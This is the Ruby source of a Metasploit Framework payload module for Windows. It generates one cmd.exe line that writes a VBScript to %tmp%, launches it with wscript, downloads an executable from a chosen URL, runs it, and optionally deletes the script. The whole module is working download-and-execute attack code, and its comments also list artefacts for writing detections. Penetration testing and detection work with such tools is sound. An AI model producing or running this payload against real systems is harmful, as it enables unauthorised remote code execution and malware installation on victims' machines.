rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/download_exec_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Single-stage Windows command payload: emits one cmd.exe command line that
# writes a small VBScript into %tmp%, runs it with wscript, and has that
# script fetch a file over HTTP(S), save it and launch it.
#
# Artefacts visible in the generated command (useful when writing detections):
# * cmd.exe doing `cd %tmp%` and redirecting `echo` output into a .vbs file
#   whose name is one or two random letters;
# * `start wscript <name>.vbs` spawned from that command line;
# * a script body that instantiates Microsoft.XMLHTTP, ADODB.Stream and
#   WScript.Shell (plus Scripting.FileSystemObject when DELETE is set);
# * a new file with a one- or two-letter name and the EXT extension, written
#   relative to the working directory selected by `cd %tmp%`.
module MetasploitModule
  # Size is declared dynamic rather than as a fixed cached byte count.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and the four datastore options read by
  # #command_string.
  #
  # @param info [Hash] metadata supplied by the caller; merged with the
  #   defaults below via merge_info
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name'        => 'Windows Executable Download and Execute (via .vbs)',
        'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
        'Author'      => 'scriptjunkie',
        'License'     => BSD_LICENSE,
        'Platform'    => 'win',
        'Arch'        => ARCH_CMD,
        # No handler is attached to this payload.
        'Handler'     => Msf::Handler::None,
        'Session'     => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        # The generated command launches the script with wscript.
        'RequiredCmd' => 'wscript',
        'Payload'     => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )

    # URL and EXT are interpolated verbatim into the command line and the
    # script text by #command_string; no quoting or escaping is applied there.
    payload_options = [
      OptString.new('URL', [ true, 'The pre-encoded URL to the executable' ]),
      OptString.new('EXT', [ true, 'The extension to give the saved file', 'exe' ]),
      OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),
      OptBool.new('DELETE', [ true, 'Delete created .vbs after download', true ])
    ]
    register_options(payload_options)
  end

  # Builds the payload: whatever the parent generator returns, followed by
  # the command line from #command_string.
  #
  # @param _opts [Hash] unused here; passed up to the parent implicitly
  # @return [String]
  def generate(_opts = {})
    super + command_string
  end

  # Assembles the one-line command.
  #
  # Layout of the result:
  #   [cmd.exe /q /c ]cd %tmp%&echo <vbs statements> ><name>.vbs&start wscript <name>.vbs
  # The VBScript statements are separated by ':' so the whole script fits on
  # the single line written by `echo`.
  #
  # @return [String] the command line
  def command_string
    # The command line is already long, so every generated identifier is
    # limited to one or two letters.
    script_stem = Rex::Text.rand_text_alpha(1..2)
    file_stem = Rex::Text.rand_text_alpha(1..2)
    http = Rex::Text.rand_text_alpha(1..2)
    stream = Rex::Text.rand_text_alpha(1..2)

    url = datastore['URL']
    saved_as = "#{file_stem}.#{datastore['EXT']}"

    statements = [
      %Q[Set #{http}=CreateObject("Microsoft.XMLHTTP")],
      # Third argument False: the request is synchronous.
      %Q[#{http}.Open "GET","#{url}",False],
      %Q[#{http}.Send],
      %Q[Set #{stream}=CreateObject("ADODB.Stream")],
      # Type 1 selects binary mode for the stream.
      %Q[#{stream}.Type=1],
      %Q[#{stream}.Open],
      %Q[#{stream}.Write #{http}.responseBody],
      # Save option 2 overwrites an existing file of the same name.
      %Q[#{stream}.SaveToFile "#{saved_as}",2],
      %Q[CreateObject("WScript.Shell").Run "#{saved_as}"]
    ]

    # Every statement, including the last, is followed by ':'.
    script = statements.map { |stmt| "#{stmt}:" }.join
    if datastore['DELETE']
      # Optional final statement: the script removes its own .vbs file.
      script << %Q[CreateObject("Scripting.FileSystemObject").DeleteFile "#{script_stem}.vbs"]
    end

    shell_prefix = datastore['INCLUDECMD'] ? 'cmd.exe /q /c ' : ''

    # "start wscript ..." rather than running the .vbs directly, so the console
    # window goes away quickly instead of staying up while the wscript
    # libraries load and the file downloads.
    "#{shell_prefix}cd %tmp%&echo #{script} >#{script_stem}.vbs&start wscript #{script_stem}.vbs"
  end
end